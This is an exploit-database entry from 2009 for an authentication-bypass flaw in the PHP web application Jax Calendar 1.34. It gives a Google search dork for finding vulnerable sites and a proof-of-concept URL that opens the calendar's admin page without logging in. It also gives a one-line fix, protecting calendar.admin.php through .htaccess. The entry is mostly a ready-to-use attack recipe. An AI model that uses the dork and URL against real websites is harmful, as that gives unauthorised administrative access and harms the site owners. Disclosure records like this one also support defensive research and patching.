Jax Calendar 1.34 Remote Admin Access Exploit

2009-12-30T00:00:00
ID 1337DAY-ID-10502
Type zdt
Reporter Sora
Modified 2009-12-30T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================
Jax Calendar 1.34 Remote Admin Access Exploit
=============================================

# Exploit Title: Jax Calendar 1.34 Remote Admin Access Exploit
# Date: December 30th, 2009
# Author: Sora
# Software Link: http://www.jtr.de/scripting/php
# Version: 1.34
# Tested on: Windows Vista and Linux (Backtrack 3)
----------------------------
 
> Jax Calendar 1.34 Remote Admin Access Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail.com
 
# Google dork: "Jax Calendar v1.34 by Jack (tR), www.jtr.de/scripting/php"
 
Description:
Jax Calendar 1.34 suffers a remote admin access vulnerability.
 
Solution:
Add calendar.admin.php to your .htaccess file.
 
# POC:
http://www.site.com/kalender/admin/calendar.admin.php?cal_id=0&language=english



#  0day.today [2018-03-09]  #